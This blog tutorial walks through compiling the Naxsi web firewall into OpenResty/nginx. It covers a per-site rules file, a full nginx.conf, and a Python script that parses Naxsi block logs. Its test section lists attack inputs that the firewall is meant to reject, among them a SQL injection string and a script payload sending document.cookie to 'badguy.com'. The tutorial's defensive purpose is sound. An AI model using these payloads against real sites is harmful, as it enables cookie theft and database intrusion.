2. Download Naxsi

cd /data0/software
wget https://github.com/nbs-system/naxsi/archive/master.zip
mv master naxsi-master.zip
unzip naxsi-master.zip
3. Recompile Nginx with the naxsi module

Naxsi is a static module here, so it has to be compiled into the nginx (OpenResty) binary; add it with --add-module pointing at the naxsi_src directory that the unzip step produced:

cd ngx_openresty-1.4.3.6
./configure --user=www --group=www --prefix=/usr/local/openresty --with-luajit --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_realip_module --add-module=/data0/software/naxsi-master/naxsi_src
gmake
gmake install
cd ../
4. Copy Naxsi's core rule set

cp naxsi_config/naxsi_core.rules /usr/webserver/nginx/conf/
Define the security rules for one virtual host. The core rules (MainRule) only assign scores to requests; this file sets the per-site thresholds that turn a score into a block. Note that SecRulesEnabled, DeniedUrl and CheckRule are location-level directives, so this file is included from inside a location block (see the www.abc.com server below), not at http or server level.

vi mysite.rules

Contents:

#LearningMode;     # enables learning mode: matches are logged but nothing is blocked
SecRulesEnabled;
#SecRulesDisabled;
DeniedUrl "/RequestDenied";

## check rules
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;
Edit nginx.conf

Add the following inside the http block (the core rules are MainRule directives and must be loaded at http level):

include naxsi_core.rules;

The complete nginx.conf:
user  www www;
worker_processes  8;
error_log  /data1/logs/nginx_error.log  crit;
pid        logs/nginx.pid;   # default location under the nginx prefix

#Specifies the value for maximum file descriptors that can be opened by this process.
worker_rlimit_nofile 65535;

events {
    use epoll;
    worker_connections 65535;
}

http {
    include       mime.types;
    default_type  application/octet-stream;
    #charset gb2312;

    # naxsi core signatures (MainRule) are loaded at http level
    include naxsi_core.rules;

    server_names_hash_bucket_size 128;
    client_header_buffer_size 32k;
    large_client_header_buffers 4 32k;
    client_max_body_size 8m;

    sendfile on;
    tcp_nopush on;
    keepalive_timeout 60;
    tcp_nodelay on;
    server_tokens off;

    fastcgi_connect_timeout 300;
    fastcgi_send_timeout 300;
    fastcgi_read_timeout 300;
    fastcgi_buffer_size 64k;
    fastcgi_buffers 4 64k;
    fastcgi_busy_buffers_size 128k;
    fastcgi_temp_file_write_size 128k;

    gzip on;
    gzip_min_length 1k;
    gzip_buffers 4 16k;
    gzip_http_version 1.0;
    gzip_comp_level 2;
    gzip_types text/plain application/x-javascript text/css application/xml;
    gzip_vary on;

    #limit_zone crawler $binary_remote_addr 10m;

    log_format access '$remote_addr - $remote_user [$time_local] "$request" '
                      '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
                      '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';
    # the wwwlogs format string was not preserved in the source; a standard
    # combined-style format is used here
    log_format wwwlogs '$remote_addr - $remote_user [$time_local] "$request" '
                       '$status $body_bytes_sent "$http_referer" "$http_user_agent"';

    # backend vhost (PHP site), reached only via 127.0.0.1
    server {
        listen 80;
        server_name blog.abc.com;
        index index.html index.htm index.php;
        root /data0/htdocs/blog;
        #limit_conn crawler 20;

        location ~ .*\.(php|php5)?$ {
            #fastcgi_pass unix:/tmp/php-cgi.sock;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            include fcgi.conf;
        }
        location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$ {
            expires 30d;
        }
        location ~ .*\.(js|css)?$ {
            expires 1h;
        }
        access_log /data1/logs/access.log access;
    }

    # public vhost protected by naxsi; it proxies to the backend above
    server {
        listen 80;
        server_name www.abc.com;

        location / {
            include mysite.rules;            # naxsi rules are location-level
            proxy_pass http://127.0.0.1/;
            # the Host value was truncated in the source; it must select the
            # backend vhost, not www.abc.com, or nginx proxies to itself in a loop
            proxy_set_header Host blog.abc.com;
        }

        # naxsi sends blocked requests here (DeniedUrl in mysite.rules)
        location /RequestDenied {
            return 403;
        }

        access_log /data1/logs/wwwlogs.log wwwlogs;
        error_log  /data1/logs/mysite_nginx_error.log debug;
    }

    server {
        listen 80;
        server_name status.abc.com;
        location / {
            stub_status on;
            access_log off;
        }
    }
}
5. Start Nginx

Check the new configuration first, then restart. Because naxsi was compiled into the binary, -s reload is not enough: the old master process must exit and the new binary must be started. killall -9 drops in-flight requests; sbin/nginx -s quit stops gracefully if that matters.

/usr/webserver/nginx/sbin/nginx -t
killall -9 nginx
/usr/webserver/nginx/sbin/nginx
6. Test

http://www.abc.com/test.php?name=40/**/and/**/1=1    rejected: contains a SQL conditional injection (comment-based evasion)
http://www.abc.com/test.php?name=%28%29    rejected: special characters (parentheses)
http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E    rejected: parameter contains script injection
http://www.abc.com/test.php?title=Meta%20http-equiv=%22refresh%22%20content=%220;%22    rejected
Requests filtered by naxsi can be reviewed in /data1/logs/mysite_nginx_error.log. Each blocked request produces a NAXSI_FMT line giving the client ip, server, uri, whether learning mode was on, and the matched rule ids (idN) with their zone (zoneN) and variable name (var_nameN); naxsi writes these at the error level, so the debug level above only adds nginx's own debug output on top.
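To make the test step and the log check reproducible, here is an added example (not code from the original post or from naxsi) that parses NAXSI_FMT lines out of the error log and replays the CheckRule thresholds from mysite.rules against the per-counter scores naxsi reports. The field layout it assumes (ip, server, uri, learning, cscoreN/scoreN, zoneN/idN/var_nameN) follows the NAXSI_FMT line shape; the sample log lines are constructed for the test URLs above and are not real captures.

```python
"""Parse naxsi NAXSI_FMT error-log lines and replay the page's CheckRule thresholds.

Added example, not code from the original post or from naxsi. Assumptions: the
NAXSI_FMT field layout (ip=&server=&uri=&learning=&...&cscoreN=&scoreN=&zoneN=
&idN=&var_nameN=) and the sample log below, which is constructed, not captured.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl

# CheckRule thresholds copied from mysite.rules on this page.
CHECK_RULES = {"$SQL": 8, "$RFI": 8, "$TRAVERSAL": 4, "$EVADE": 4, "$XSS": 8}

# Constructed sample of /data1/logs/mysite_nginx_error.log (not a real capture).
SAMPLE_LOG = """\
2013/12/05 10:21:03 [error] 12345#0: *7 NAXSI_FMT: ip=10.0.0.5&server=www.abc.com&uri=/test.php&learning=0&vers=0.53&total_processed=7&total_blocked=3&cscore0=$SQL&score0=18&zone0=ARGS&id0=1003&var_name0=name&zone1=ARGS&id1=1004&var_name1=name&zone2=ARGS&id2=1009&var_name2=name, client: 10.0.0.5, server: www.abc.com, request: "GET /test.php?name=40/**/and/**/1=1 HTTP/1.1", host: "www.abc.com"
2013/12/05 10:21:09 [error] 12345#0: *8 NAXSI_FMT: ip=10.0.0.5&server=www.abc.com&uri=/test.php&learning=0&vers=0.53&total_processed=8&total_blocked=4&cscore0=$SQL&score0=8&cscore1=$XSS&score1=16&zone0=ARGS&id0=1010&var_name0=name&zone1=ARGS&id1=1011&var_name1=name, client: 10.0.0.5, server: www.abc.com, request: "GET /test.php?name=%28%29 HTTP/1.1", host: "www.abc.com"
2013/12/05 10:21:15 [error] 12345#0: *9 NAXSI_FMT: ip=10.0.0.5&server=www.abc.com&uri=/index.php&learning=1&vers=0.53&total_processed=9&total_blocked=4&cscore0=$SQL&score0=4&zone0=ARGS&id0=1000&var_name0=q, client: 10.0.0.5, server: www.abc.com, request: "GET /index.php?q=select HTTP/1.1", host: "www.abc.com"
2013/12/05 10:21:20 [notice] 12345#0: signal process started
"""

NAXSI_RE = re.compile(r"NAXSI_FMT: (?P<fmt>.*?), client: ")
INDEXED_RE = re.compile(r"^(zone|id|var_name|cscore|score)(\d+)$")


def parse_naxsi_line(line):
    """Return a record dict for one NAXSI_FMT line, or None for any other line."""
    m = NAXSI_RE.search(line)
    if m is None:
        return None
    fields = dict(parse_qsl(m.group("fmt"), keep_blank_values=True))
    record = {
        "ip": fields.get("ip"),
        "server": fields.get("server"),
        "uri": fields.get("uri"),
        "learning": fields.get("learning") == "1",
        "scores": {},    # counter name -> accumulated score, e.g. {"$SQL": 18}
        "matches": [],   # (zone, rule id, variable name) per matched MainRule
    }
    # cscoreN/scoreN and zoneN/idN/var_nameN are two independent numbered series.
    grouped = {}
    for key, value in fields.items():
        im = INDEXED_RE.match(key)
        if im:
            grouped.setdefault(int(im.group(2)), {})[im.group(1)] = value
    for idx in sorted(grouped):
        entry = grouped[idx]
        if "cscore" in entry:
            record["scores"][entry["cscore"]] = int(entry.get("score", 0))
        if "id" in entry:
            record["matches"].append(
                (entry.get("zone"), int(entry["id"]), entry.get("var_name")))
    return record


def fired_check_rules(record, check_rules=CHECK_RULES):
    """Counters whose score reached the CheckRule threshold for this request."""
    return sorted(name for name, score in record["scores"].items()
                  if score >= check_rules.get(name, float("inf")))


def summarize(log_text):
    """Parse every NAXSI_FMT line and attach the verdict the rules above imply."""
    records = []
    for line in log_text.splitlines():
        rec = parse_naxsi_line(line)
        if rec is None:
            continue
        rec["fired"] = fired_check_rules(rec)
        # In LearningMode naxsi logs the match but lets the request through.
        rec["blocked"] = bool(rec["fired"]) and not rec["learning"]
        records.append(rec)
    return records


def top_rule_ids(records):
    """Rule ids by hit count; useful for spotting signatures that need whitelists."""
    return Counter(rid for rec in records for _, rid, _ in rec["matches"]).most_common()


if __name__ == "__main__":
    recs = summarize(SAMPLE_LOG)
    for rec in recs:
        state = "BLOCKED" if rec["blocked"] else ("learning, passed" if rec["learning"] else "passed")
        print(f"{rec['ip']} {rec['uri']} scores={rec['scores']} fired={rec['fired']} -> {state}")
    print("rule id hits:", top_rule_ids(recs))
```

To run it against the real log, call summarize() on the contents of /data1/logs/mysite_nginx_error.log instead of SAMPLE_LOG. The third sample line shows why the learning flag matters: with LearningMode on, a request scoring $SQL=4 is logged but never reaches the $SQL >= 8 threshold, so reviewing these lines before switching learning off is how false positives are found and whitelisted.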
Unless otherwise noted, posts on this blog are original; when reposting, please credit this article with a link to its address: http://blog.cnwyhx.com/?p=301